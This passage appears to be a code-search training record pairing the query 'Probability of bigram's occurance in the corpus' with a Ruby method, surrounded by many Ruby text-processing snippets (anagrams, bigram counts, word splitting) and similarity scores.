($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def test_words(words, last_word)\n repetitions = []\n\n words.each do |w|\n w = w.downcase\n repetitions.push(w) if w == last_word\n last_word = w\n end\n\n [repetitions, last_word]\nend",
"def find_anagrams( words )\r\n\tif words.empty?\r\n\t\tresult = []\r\n\telse\r\n\t\tresult = []\r\n\t\tsource = words[0]\r\n\t\twords.each do |w|\r\n\t\t\tif are_anagrams?( source, w )\r\n\t\t\t\tresult << w\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\t\r\n\treturn result\r\nend",
"def match(word_array)\n results = []\n word_array.each do |word|\n results << word if word.split(\"\").sort == @word.split(\"\").sort\n end\n results\n end",
"def match(array_possible_anagrams)\n matching_words=[]\n word_broken=self.word.split(\"\").sort\n array_possible_anagrams.each do |possible_match|\n #possible_match=possible.word\n possible_match_broken=possible_match.split(\"\").sort\n if possible_match_broken == word_broken\n matching_words << possible_match\n else\n end #end of if\n end #end of do\n matching_words\n end",
"def common_ngrams_from_words(words)\n ngrams_from_words(words).select { |ngram| has_ngram?(ngram) }\n end",
"def alternate_words(wrd)\n result = []\n counter = 0\n wrd_2 = wrd.gsub(/[!@$#%^&*()-=_+\\[\\]:;,.\\/<>?\\|]/, \" \")\n words = wrd_2.split(/\\s+/)\n words.each do |word|\n result << word if counter % 2 == 0\n counter += 1\n end\n return result\nend",
"def word_unscrambler(word, dictionary)\nresult = []\ndictionary.each do |entry|\n\tif entry.split(\"\").sort.join(\"\") == word.split(\"\").sort.join(\"\")\n\t\tresult << entry\n\tend\nend\nresult \nend",
"def each_word_pair_v1\n words.each_con(2) {|array| yield array[0],array[1]}\n end",
"def combine_anagrams(words)\n result = []\n words.each do |word|\n anagrams = words.find_all{|item| item.downcase.chars.sort.join == word.downcase.chars.sort.join }\n result.push(anagrams)\n end\n result.uniq\nend",
"def scramble_words(words)\n first_word = words[0]\n last_word = words[-1]\n alphabetically = words[1, (words.size - 2)].chars.sort\n alphabetically.unshift(first_word).push(last_word).join\nend",
"def query(word)\n node = @the_node\n results = []\n word.split(\"\").each do |letter|\n next_node = node[letter]\n if next_node != nil\n node = next_node\n next\n else\n return ['']\n end\n end\n results << Word.new(word, node.final)\n results += get_childs(node).map{|s| Word.new(word) + s}\n results.select{|r| r.final}.map{|r| r.to_s }\n end",
"def next_words(word, data_subsets)\n total_chars = word.length\n last_six = word[(total_chars - CUT_WORD_LENGTH)..(total_chars)]\n exp = Regexp.new(\"^#{last_six}\")\n\n result = []\n\n hash_key = last_six.match(/.../).to_s\n data_subset_for_word = data_subsets[hash_key]\n return [] if data_subset_for_word.nil?\n\n data_subset_for_word.each do |compared_word|\n if compared_word.match(exp)\n if compared_word != word\n result << compared_word\n end\n end\n end\n result\nend",
"def word_unscrambler(str, words)\n result = []\n dictionary = words\n scrambled = str\n #words = words.sort! ###\n\n words.each do |word|\n #puts \" word.split = #{word.split}\" ########\n test = word.split\n test = test[0]\n puts \"test = #{test}\" ########\n #puts \"test.split = #{test.split}\" ######\n end\n\n\n puts \"dictionary = #{dictionary}\"\n puts \"scrambled = #{scrambled}\"\n #result = test ####\n\n return result\nend",
"def match(possible_anagrams)\n anagrams = []\n possible_anagrams.each do |possible_anagram|\n if possible_anagram.split(\"\").sort == @word.split(\"\").sort\n anagrams << possible_anagram\n end\n end\n anagrams\nend",
"def get_words\n @sentences.each_index do |i|\n s = @sentences[i]\n words = s.split(' ')\n words.each do |w|\n word = w.gsub(WORD_SANITIZE, '').downcase\n if belongs_to_known_abbreviations? word\n add_word_to_result(word, i)\n else\n add_word_to_result(word.gsub(DOT_SANITIZE, ''), i)\n end\n end\n end\n end",
"def scramble_words(words)\n words.split(' ').map { |word| scramble(word) }.join(' ')\nend",
"def find_anagrams(target_word, array_of_words)\n array_of_anagrams = []\n\n array_of_words.each do |member|\n if member.split(//).sort == target_word.split(//).sort\n array_of_anagrams.push(member)\n else\n next\n end\n end\n array_of_anagrams\nend",
"def get_bigrams_internal(word, *args)\n http_method = :get\n path = '/word/{word}/phrasesInternal'\n path.sub!('{word}', word.to_s)\n\n # Ruby turns all key-value arguments at the end into a single hash\n # e.g. Wordnik.word.get_examples('dingo', :limit => 10, :part_of_speech => 'verb')\n # becomes {:limit => 10, :part_of_speech => 'verb'}\n last_arg = args.pop if args.last.is_a?(Hash)\n last_arg = args.pop if args.last.is_a?(Array)\n last_arg ||= {}\n\n # Look for a kwarg called :request_only, whose presence indicates\n # that we want the request itself back, not the response body\n if last_arg.is_a?(Hash) && last_arg[:request_only].present?\n request_only = true\n last_arg.delete(:request_only)\n end\n\n params = last_arg\n body ||= {}\n request = Wordnik::Request.new(http_method, path, :params => params, :body => body)\n request_only ? request : request.response.body\n end",
"def combine_anagrams(words)\n Array anagrams = []\n words.each {|x|\n flag = false\n anagrams.collect {|y|\n if x.downcase.chars.to_a.sort == y[0].downcase.chars.to_a.sort then\n y << x\n flag = true\n break\n end\n }\n unless flag; anagrams << [x] end \n }\n anagrams\nend",
"def compare(word1, word2)\n bigram_compare(bigramate(word1), bigramate(word2))\n end",
"def mcw(search)\n\t\tif !$bigrams.has_key?(search) # if the search word doesn't exist in the bigram...\n\t\t\tmost_common = nil # we're going to return nil.\n\n\t\telse most_common = $bigrams[search].max_by{|word, number| number}[0] # search for max by # of maxes\n\t\tend\n\n\t\treturn most_common\nend",
"def combine_anagrams(words)\r\n\tanagrams = find_anagrams( words )\r\n\tif anagrams.empty?\r\n\t\tresult = []\r\n\telse\r\n\t\tnewWords = words - anagrams\r\n\t\tresult = [anagrams] + combine_anagrams(newWords)\r\n\tend\r\n\t\r\n\treturn result\r\n\t\r\nend",
"def first_wa(array)\n new_array = [ ]\n other_new_array = [ ]\n \n array.each do |word|\n new_array << word.to_s\n end\n new_array.each do |word|\n if word.include?(\"wa\") == true\n then other_new_array << word\n end\n end\n other_new_array.first\nend",
"def combine_anagrams(words)\n groups = []\n words.each { |word|\n inserted = false\n groups.each { |item|\n if word.isAnagram(item[0])\n item << word\n inserted = true\n end\n }\n if ! inserted\n list = []\n list << word\n groups << list\n end\n }\n return groups\nend",
"def combine_anagrams(words)\r\n words.group_by{|w| w.downcase.chars.sort.to_s}.values\r\nend",
"def combine_anagrams(words)\n\tresult = []\n\twords.each do |word|\n\t\ttemp_word = sort_letters(word)\n\t\tis_found = false\n\t\tresult.each do |grouped_array|\n\t\t\tif !false and sort_letters(grouped_array.last) == temp_word\n\t\t\t\tgrouped_array << word\n\t\t\t\tis_found = true\n\t\t\tend\n\t\tend\n\t\tresult << [word] if !is_found\n\tend\n\tresult\nend",
"def word_splits(string, is_sub_string = false)\n if is_sub_string\n splits = nil\n else\n splits = [[string]]\n end\n search_range(string, 3).each do |pos|\n\n part_1 = string[0..pos]\n part_2 = string[(pos + 1)..-1]\n\n is_word_1 = @dictionary.is_word?(part_1)\n is_word_2 = @dictionary.is_word?(part_2)\n\n if is_word_1 && is_word_2\n if is_sub_string\n return [part_1, part_2]\n else\n splits << [part_1, part_2]\n end\n elsif is_word_1\n split_2 = word_splits(part_2, true)\n unless split_2.nil?\n if is_sub_string\n return [part_1, split_2].flatten\n else\n splits << [part_1, split_2].flatten\n end\n end\n end\n\n end\n splits\n end",
"def combine_anagrams(list_of_words)\n result = []\n list_of_words.each { | word |\n found = false \n for added_words in result\n if word.anagrams?(added_words[0])\n added_words << word\n puts \"==>#{added_words}\"\n found = true\n break \n end \n end\n #Add the new anagram group list\n if !found then result << [word] end\n }\n return result\nend",
"def mcw(word)\n\t\tmostCommonWord = ''\n\t\tvalue = 0\n\t\t#determines if a word in a hash happens the most\n\t\t#p $bigrams[word]\n\t\t$bigrams[word].each do |x|\n\t\t\tif x[1] > value\n\t\t\t\tmostCommonWord = x[0]\n\t\t\t\tvalue = x[1]\n\n\t\t\t#if two hashes have the same value, then randomly chooses between the two\n\t\t\telsif x[1] == value\n\t\t\t\tchoice = Random.rand(2)\n\t\t\t\tif choice == 1\n\t\t\t\t\tmostCommonWord = x[0]\n\t\t\t\t\tvalue = x[1]\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn mostCommonWord\n\tend",
"def scramble_words(words)\n words.split.map do |word|\n scramble_word(word)\n end.join(' ')\nend",
"def anagrams(word, words)\n word = word.chars.sort\n words.select{|x| x.chars.sort == word}\nend",
"def combine_anagrams(words)\n\n output = []\n \n words.each do |w|\n \n anag = []\n rest = []\n head = w.downcase.scan(/./).sort.join\n regexp = \"\\\\b\"+head+\"\\\\b\"\n \n words.each do |word|\n \n if Regexp.new(regexp,true) =~ word.downcase.scan(/./).sort.join\n anag = anag + [word]\n else\n rest = rest + [word] \n end\n \n end\n \n if not output.include? anag\n output << anag\n end\n\n end\n \n return output\n \nend",
"def each_word_pair\n word_array = words\n index = 0\n while index < word_array.size\n yield word_array[index], word_array[index+1]\n index += 1\n end\n end",
"def combine_anagrams(words)\n @results = []\n word_bins = words.group_by { |word| word.length }\n word_bins.values.map { |sublist| \n sublist = sublist.zip(sublist)\n sublist.map { |wordpairs| wordpairs[0] = wordpairs[0].downcase.chars.sort.join }\n # collect unique keys for this sublist:\n keys = sublist.collect { |list| list[0] }.uniq\n # print \"keys: \", keys, \"\\n\"\n keys.each do |key| \n anagrams = sublist.collect { |list| list[0] == key ? list[1] : nil }\n anagrams.compact!\n @results << anagrams\n # print \"anagrams= \", anagrams, \"\\n\"\n end\n # print sublist.length, \": \", sublist, \"\\n\\n\" \n }\n # print \"final results: \", @results, \"\\n\"\n @results\nend",
"def words_1_letter_diff(word)\n\treturn words_of_same_length(word).find_all {|w| compare_words(word, \tw) == 1}\nend",
"def combine_anagrams(words)\n words.group_by {|w| w.downcase.chars.sort {|a,b| a <=> b}.to_s}.values\nend",
"def combine_anagrams(words)\n anagrams = []\n available_words = words\n words.each do |e|\n group = []\n temp_words = []\n anagram_invariant = e.downcase.chars.sort.join\n available_words.each do |i|\n test = i.downcase.chars.sort.join\n if test == anagram_invariant\n group.push(i)\n else\n temp_words.push(i)\n end\n end\n if(!group.empty?)\n anagrams.push(group)\n end\n available_words = temp_words\n end\n return anagrams\nend",
"def unscramble(scramble)\n $word_list.select { |a| a.chars.sort == scramble.chars.sort }\nend",
"def combine_anagrams(words)\r\n\t\r\n\tresult = []\r\n\twords1 = [];\r\n\twords.each {|w| words1 << w.to_s.downcase.chars.sort.join}\r\n\twords2 = words1.uniq\r\n\t\r\n\tfor i in 0 ... words2.size\r\n\t\tr = []\r\n\t\tw2 = words2[i]\r\n\t\tfor j in 0 ... words.size\r\n\t\t\tw = words[j]\r\n\t\t\tif w2.casecmp(w.to_s.downcase.chars.sort.join) == 0\r\n\t\t\t\tr << w\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult << r\r\n\tend\r\n\t\r\n\treturn result\r\n\t\r\nend",
"def string2wordsFromBeg(string, wordsAlreadyParsed=[])\n\n if ($debug > 1)\n puts \"string2wordsFromBeg: string(#{string}) words(#{wordsAlreadyParsed})\"\n end\n\n # If this string is a word, just return it with any words already parsed.\n if isWord(string)\n wordsAlreadyParsed.push(string)\n return wordsAlreadyParsed\n end\n\n # Else divide the string into two parts, and if the 2nd part is a word, keep going.\n # Use min and max word lengths to skip checking substrings that cannot be words.\n if string.length >= $MaxWordLength + $MinWordLength\n maxLength = $MaxWordLength;\n else\n maxLength = string.length - $MinWordLength;\n end\n length = $MinWordLength;\n while (length < maxLength)\n substr = string[0..length]\n length += 1\n if isWord(substr)\n wordsAlreadyParsed.push(substr)\n moreWords = string2wordsFromBeg(string[length..999], wordsAlreadyParsed)\n if moreWords\n return moreWords\n end\n end\n end\n return nil # string did not completely parse into words\nend",
"def create_index2(word)\n word.each_char.map {|c| CHAR_MAP[c.downcase]}.reduce(:*)\n end",
"def anagrams(word, words)\n sorted_test_word = word.chars.sort.join\n sorted_words = words.map do |word|\n word.chars.sort.join\n end\n\n anagram_locations = sorted_words.map.with_index do |word, index|\n if word == sorted_test_word\n index\n end\n end.compact\n # sorted_words.keep_if.with_index {|word, index| word == sorted_test_word}\n anagrams = []\n anagram_locations.each do |location|\n anagrams << words[location]\n end\n anagrams\nend",
"def words_starting_with_un_and_ending_with_ing(text)\n result = text.scan(/\\bun\\w+/) + text.scan(/ing\\b\\w+/)\n result.uniq\nend",
"def best_next_word(set, goal)\n set.to_a[0]\n end",
"def match(anagram_ary)\n match_ary = []\n anagram_ary.each do |anagram|\n if word.split('').sort == anagram.split('').sort\n match_ary << anagram\n end\n end\n match_ary\n end",
"def split(text)\n text.downcase.scan(WORDS).uniq\n end",
"def anagrams(word, words)\n words.select { |w| w.chars.sort == word.chars.sort }\nend",
"def combine_anagrams(words)\n\toutput = Array.new # function result\n\twords.each do |word|\n\t\tsorted = word.upcase.chars.sort.join\n\t\tprint sorted, ' '\n\t\tgroup = output.find {|g| sorted == g[0].upcase.chars.sort.join}\n\t\tif not group\n\t\t\tgroup = []\n\t\t\toutput.push group\n\t\tend\n\t\tgroup.push word\n\tend\n\toutput\nend",
"def word_combos(word)\n\t\tword = word.chars.to_a\n\t\tall_word_combo = []\n\t\ti = 1\n\t\twhile i <= word.size\n\t\t\tall_word_combo << word.permutation(i).to_a\n\t\t\ti+=1\n\t\tend\n\t\treturn all_word_combo\n\tend",
"def combine_anagrams(words)\n\n\twords.group_by{|word| word.downcase.chars.sort}.values\n\t\nend",
"def combine_anagrams(words)\n result = Array.new\n words.each do |i|\n anagrams = Array.new\n sorted = i.downcase.chars.sort.join\n words.each do |j|\n if j.downcase.chars.sort.join == sorted\n anagrams << j\n end\n end\n result << anagrams\n end\n return result.uniq\nend",
"def combine_anagrams(words)\n output = []\n if words.length == 0\n return output\n end\n words.each do |item|\n s_string = item.downcase.chars.sort.join.to_s\n temp_arry = []\n words.each do |scan|\n if s_string == scan.downcase.chars.sort.join.to_s\n temp_arry << scan\n end\n end\n if output.include?(temp_arry)\n #do nothing\n else\n output << temp_arry\n end\n end\n return output\nend",
"def combine_anagrams(words)\n groups = Hash.new\n words.each do |word|\n (groups[word.downcase.chars.sort.join] ||= []) << word\n end\n groups.flatten.values_at(* groups.flatten.each_index.select {|i| i.odd?})\nend",
"def find_anagrams(base, words_list)\n words_list.select { |word| word.split('').sort == base.split('').sort }\nend",
"def find_anagrams(base, words_list)\n words_list.select { |word| word.split('').sort == base.split('').sort }\nend",
"def get_runs(word)\n word.squeeze.chars.sort.join\n end",
"def get_matches(word)\n cur = self\n word.each_char do |character|\n modified_char = @@vowels.include?(character) ? '*' : character\n return Set.new if not cur.kids.has_key? modified_char\n cur = cur.kids[modified_char]\n end\n cur.words_here\n end",
"def combine_anagrams(words)\n words_hash = Hash.new{ |hash, key| hash[key] = [] }\n words.each { |word| word_key = word.downcase.chars.sort.join; words_hash[word_key] = words_hash[word_key] << word; }\n words_list = Array.new()\n words_hash.keys.each { |key| words_list << words_hash[key] }\n return words_list\nend",
"def combine_anagrams(words)\r\n\tanagrams = words.group_by { |word| word.chars.sort }.values\t\r\nend",
"def alternate_words(sentence)\n\tnew = []\n \n'!@$#%^&*()-=_+[]:;,./<>?\\\\|'.split(//).each do |x|\n sentence = sentence.gsub(x, ' ')\n end\n \n var = sentence.split() \n var.each_with_index {|x,y| new.push x if y.even?}\n\treturn new\nend",
"def get_word_results(word, label=nil)\n return [word]\n end",
"def stem_tokens(tokens)\n stem_list = []\n\n # Looping through the list and finding the stem word for each word\n for word in tokens\n word = word[/\\w*/]\n s = word.stem\n stem_list.push(s)\n end\n\n return stem_list\nend",
"def similar_two(str, best_dist = 2)\n best_pair = str.first(2)\n # Arbitrarily large distance\n best_so_far = str.map(&:length).max * 42\n\n str.combination(2).each do |a, b|\n next if a.length != b.length\n\n dist = Levenshtein.distance(a, b)\n\n return [a, b] if dist == best_dist\n\n if dist < best_so_far\n best_pair = [a, b]\n best_so_far = dist\n end\n end\n\n best_pair\n end",
"def combine_anagrams(words)\n\n ouArr = Array.new\n\n words.each do |w|\n\n ouIt = Array.new [w]\n\n words.each do |w2|\n if w.downcase.chars.sort == w2.downcase.chars.sort && !ouIt.include?(w2)\n ouIt.push(w2)\n end\n end\n ouIt.sort!\n\n if !ouArr.include?(ouIt)\n ouArr.push(ouIt)\n end\n end\n ouArr\nend",
"def combine_anagrams(words)\r\n\tswords = Array.new\r\n\tnoDups = Array.new\r\n\tgroupWords = Array.new\r\n\tanagrams = Array.new\r\n\twords.each {|word| swords << word.downcase.chars.sort.join}\r\n\tswords.each{|word| noDups << word unless !noDups.index(word).nil? }\r\n\tnoDups.each do|tword|\r\n\t\t\t\t\t\r\n\t\t\t\t\tgroupWords = Array.new\r\n\t\t\t\t\twords.each {|word| groupWords << word unless word.downcase.chars.sort.join != tword}\r\n\t\t\t\t\tanagrams << groupWords\r\n\t\t\t\tend\r\n\t\t\t\t\r\n\treturn anagrams\r\nend",
"def alternate_words(string)\n\tary = []\n\tword_ary = string.clean.split(/ /)\n\tword_ary.each_index do |idx|\n\t\tary.push(word_ary[idx]) if idx.even?\n\tend\n\tary\nend",
"def pig_it_ms_two(str)\n pig = []\n str.split.each do |w|\n pig << w.chars.rotate.join + \"ay\" if w =~ /\\w/\n pig << w if w =~ /\\W/\n end\n pig.join(\" \")\nend",
"def word_unscrambler(str, words)\n return words.keep_if {|word| word.chars.sort == str.chars.sort}\nend",
"def reverse_each_word(sentence2)\n new2 = []\n save2 = sentence2.split\n save2.collect do |more_words|\n new2 << more_words.reverse\n end\n new2.join(\" \")\nend",
"def find_concatenated(word)\n [].tap { |a| probe_words(0, word, a) }\n end",
"def combine_anagrams(words=[])\n return [] if words.empty?\n hash = {}\n words.each do |word|\n anagram = word.downcase.split(\"\").sort.join(\"\")\n if hash[anagram].nil? then\n hash[anagram]=[word]\n else\n hash[anagram].push(word)\n end\n end\n return hash.values\nend",
"def subwords(word, dictionary)\n arr = substrings(word)\n arr.select { |str| dictionary.include?(str) }\nend",
"def combine_anagrams(words)\n words_uniq = words.map{ |w| w.downcase.split(//).sort.join }.uniq\n words_uniq.map{ |wu| words.select{ |w| w.downcase.split(//).sort.join == wu }}\nend",
"def find_anagrams(base_word, word_list)\n word_list.select do |word|\n anagram?(base_word, word)\n end\nend"
] | [
"0.6646076",
"0.6422299",
"0.6274176",
"0.6154079",
"0.5990007",
"0.5912253",
"0.5783322",
"0.56626743",
"0.56262785",
"0.5603809",
"0.5599354",
"0.5597414",
"0.5511246",
"0.54985464",
"0.5465181",
"0.54564214",
"0.54392844",
"0.5434038",
"0.5416444",
"0.5407946",
"0.5404497",
"0.53956217",
"0.53777164",
"0.537201",
"0.5361397",
"0.5355884",
"0.53519475",
"0.5351933",
"0.5332793",
"0.53272885",
"0.53227526",
"0.5314751",
"0.5313844",
"0.530947",
"0.530234",
"0.52960294",
"0.5285006",
"0.52708",
"0.5261254",
"0.52609503",
"0.5258902",
"0.5245864",
"0.5243672",
"0.5207195",
"0.52065104",
"0.518032",
"0.5179291",
"0.5178227",
"0.5177758",
"0.51740974",
"0.5165691",
"0.5162833",
"0.5151367",
"0.5149879",
"0.51493675",
"0.5147591",
"0.5141891",
"0.51373214",
"0.5136203",
"0.513434",
"0.5130681",
"0.5116081",
"0.5111076",
"0.5108686",
"0.5106737",
"0.51051575",
"0.51048344",
"0.50955826",
"0.50843567",
"0.50723934",
"0.5071059",
"0.50633574",
"0.5060815",
"0.50535667",
"0.50462466",
"0.5043022",
"0.50423515",
"0.50361365",
"0.5029992",
"0.50140816",
"0.50140816",
"0.5009728",
"0.50088614",
"0.50007033",
"0.49915928",
"0.4989366",
"0.49778906",
"0.4977855",
"0.49695542",
"0.49690711",
"0.4967548",
"0.4962762",
"0.49573028",
"0.49519393",
"0.49519306",
"0.4951806",
"0.4941665",
"0.49416125",
"0.4940567",
"0.49375215"
] | 0.73009706 | 0 |
Probability of bigram's occurance in the corpus. | def probability(word1, word2=nil)
bigram = (Bigram === word1 ? word1 : get(word1, word2))
BigDecimal.new(bigram.count) / total #size
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def probability_of(gram)\n @probabilities.fetch(gram,0.0)\n end",
"def text_probability(text)\n probability_of_ngrams(ngrams_from_text(text))\n end",
"def calculate_probability(word)\n ham_word_frequency = 2 * words_hash[[word,:good]]\n spam_word_frequency = words_hash[[word, :bad]]\n return if ham_word_frequency + spam_word_frequency < 5\n word_probability = min(1.0, spam_word_frequency.to_f / spam_count)\n total_probability = word_probability + min(1.0, ham_word_frequency.to_f / ham_count)\n max(0.1, min(0.99, word_probability/total_probability))\n end",
"def probability(word)\n word = (Word === word ? word : get(word))\n BigDecimal.new(word.count) / total\n end",
"def file_probability(word1, word2=nil)\n bigram = (Bigram === word1 ? word1 : get(word1, word2))\n BigDecimal.new(bigram.files.size) / analysis.files.size\n end",
"def sentence_probability(sentence)\n probability_of_ngrams(ngrams_from_sentence(sentence))\n end",
"def calculate_probabilities\n @words_hash.keys.each do |word, _|\n @probability_hash[word] = calculate_probability(word)\n end\n end",
"def fragment_probability(fragment)\n probability_of_ngrams(ngrams_from_fragment(fragment))\n end",
"def spamicity(message)\n words = message.split(/\\W+/).map { |m| m.downcase}\n intersting_words_probability_list = intersting_words(words)\n intersting_words_product = intersting_words_probability_list.inject(:*)\n total_probability = intersting_words_product + intersting_words_probability_list.map { |x| 1 - x }.inject(:*)\n intersting_words_product / total_probability\n end",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' 